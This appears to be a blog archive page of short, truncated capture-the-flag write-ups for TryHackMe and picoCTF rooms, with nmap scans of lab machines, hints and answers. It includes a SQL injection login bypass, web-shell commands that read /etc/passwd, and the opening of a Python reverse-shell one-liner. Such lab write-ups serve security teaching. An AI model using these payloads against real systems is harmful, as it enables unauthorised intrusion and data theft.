Posts

Showing posts from May, 2021

Vulnversity - TryHackMe!

Enumerations

Nmap scan

Here are the task 2 answers, all in this nmap scan.

# Nmap 7.91 scan initiated Sun May 30 18:01:18 2021 as: nmap -sV -sC -oN nmap/vuln 10.10.205.62
Nmap scan report for 10.10.205.62
Host is up (0.22s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.1

Pickle Rick - TryHackMe!

Enumeration

Nmap scan result

# Nmap 7.91 scan initiated Thu May 27 08:23:53 2021 as: nmap -sV -sC -oN nmap/pickle_rick 10.10.11.26
Nmap scan report for 10.10.11.26
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:72:fe:b9:a6:8a:40:99:46:b0:ff:34:50:7a:de:4e (RSA)
|   256 0b:0e:f8:1e:d5:aa:89:96:d5:4a:96:de:bd:83:3a:b6 (ECDSA)
|_  256 c2:9a:86:0e:c8:d8:27:6d:c1:b5:40:99:ce:47:92:7a (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 27 08:24:37 2021 -- 1 IP address (1 host up) scanned in 43.28 seconds

Here we found that port 80 is open. When you go int

OWASP Juice Shop - TryHackMe!

Task 1

When you go to the IP you can see the Juice Shop store.

Task 2

Question #1: What's the Administrator's email address?
Click an item in the Juice Shop and view the reviews.
admin@juice-sh.op

Question #2: What parameter is used for searching?
When you search for an item, you can get the parameter name after the question mark (http://10.10.163.117/#/search?q=apple).
q

Question #3: What show does Jim reference in his review?
His review says "Fresh out of a replicator." Search for this on Google and you get the answer: what is a replicator?
star trek

Task 3

Question #1: Log into the administrator account!
In this case we need to get into the admin account; this will be an easy injection. First go to the login page and type this in the email field: ' or 1=1-- and set the password to whatever you like. Here we go, now you are in the admin account.

Task 4

Question #1: Bruteforce the Administrator account's password!
They provide a guideline to do t

OWASP Top 10 - TryHackMe (Only practical tasks)

Task 5: [Severity 1] Command Injection Practical

Go to the link; mine was http://10.10.163.167/evilshell.php

What strange text file is in the website root directory? (Use the 'ls' command in the web shell.)
drpepper.txt

How many non-root/non-service/non-daemon users are there? (You can see them in the passwd file: simply use cat /etc/passwd and look for the users.)
0

What user is this app running as? (Simply use the 'whoami' command to see who the user is.)
www-data

What is the user's shell set as? (cat /etc/passwd)
/usr/sbin/nologin

What version of Ubuntu is running? (You can use 'lsb_release -a' to see the version number.)
18.04.4

Print out the MOTD. What favorite beverage is shown? (You can cat that file like this: cat /etc/update-motd.d/00-header)
DR PEPPER

Since we can do command injection, let's get a reverse shell!

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock

PicoCTF - Matryoshka doll

In a forensic challenge with an image it is common to start with a standard set of tools to look for a flag. First, exiftool, which gives access to the metadata (the additional information stored in an image), but here we do not get anything very interesting. Then strings, which gives access to all the legible characters in the image, but once again no flag. We can also use another tool to check the layers, but the answer lies elsewhere.

The solution: using binwalk we look at the file signatures and can read that the image contains a zip archive. So we can unzip the image and get another image of a smaller doll. You will have understood the reasoning: keep unzipping each image until you get a text file, which contains the flag.

PicoCTF - keygenme-py - Reverse

Looking at keygenme-trial.py

Instead of running the script right away, it is best practice to read the source code, right?

username_trial = "GOUGH"
bUsername_trial = b"GOUGH"

key_part_static1_trial = "picoCTF{1n_7h3_|<3y_of_"
key_part_dynamic1_trial = "xxxxxxxx"
key_part_static2_trial = "}"
key_full_template_trial = key_part_static1_trial + key_part_dynamic1_trial + key_part_static2_trial

This will be obvious later. Next, of course, the flag! Or here it is called the key. It is comprised of two static parts and a dynamic part:

key_full_template_trial = key_part_static1_trial + key_part_dynamic1_trial + key_part_static2_trial

Great… maybe we can have a look at how the dynamic part is generated?

Dynamic key

To check the validity of the dynamic key, the following function is used:

def check_key(key, username_trial):
    global key_full_template_trial
    if len(key) != len(

PicoCTF - Static ain't always noise - general

After downloading the two files, take a look into the bash file.

#!/bin/bash

echo "Attempting disassembly of $1 ..."

#This usage of "objdump" disassembles all (-D) of the first file given by
#invoker, but only prints out the ".text" section (-j .text) (only section)
#that matters in almost any compiled program...

objdump -Dj .text $1 > $1.ltdis.x86_64.txt

#Check that $1.ltdis.x86_64.txt is non-empty
#Continue if it is, otherwise print error and eject
if [ -s "$1.ltdis.x86_64.txt" ]
then
    echo "Disassembly successful! Available at: $1.ltdis.x86_64.txt"

    echo "Ripping strings from binary with file offsets..."
    strings -a -t x $1 > $1.ltdis.strings.txt
    echo "Any strings found in $1 have been written to $1.ltdis.strings.txt with file offset"
else
    echo "Disassembly failed!"
    echo "Usage: ltdis.sh <program-file>"

Web fundamentals (using Burp Suite and curl) - TryHackMe!

Tasks 1, 2, 3, 4

You can read their document carefully and find the answers. You can find two answers via the given link on the Firefox HTTP format page.

Task 5 (Mini CTF)

Here I will show two methods. Watch my video for visual understanding: https://youtu.be/6j4Ghryj0mY

Here is the webpage you get:

Burp Suite option

Go to Burp Suite and launch the browser, then type your machine IP with the port. http://10.10.248.152:8081 was my IP; yours will be different. Select the right HTTP request and press CTRL+R to send it to the Repeater. Then type your first clue and send it. Then type your second clue after changing the GET to a POST request. Then go to the action tab, select "URL-encode as you type", and send it. Now we need to get the cookie: change the first line to 'GET /ctf/getcookie' and send it. Now we need to send the cookie: for that, change the request to 'GET /ctf/sendcookie', go to the Inspector tab and add a cookie.

curl option (TryHa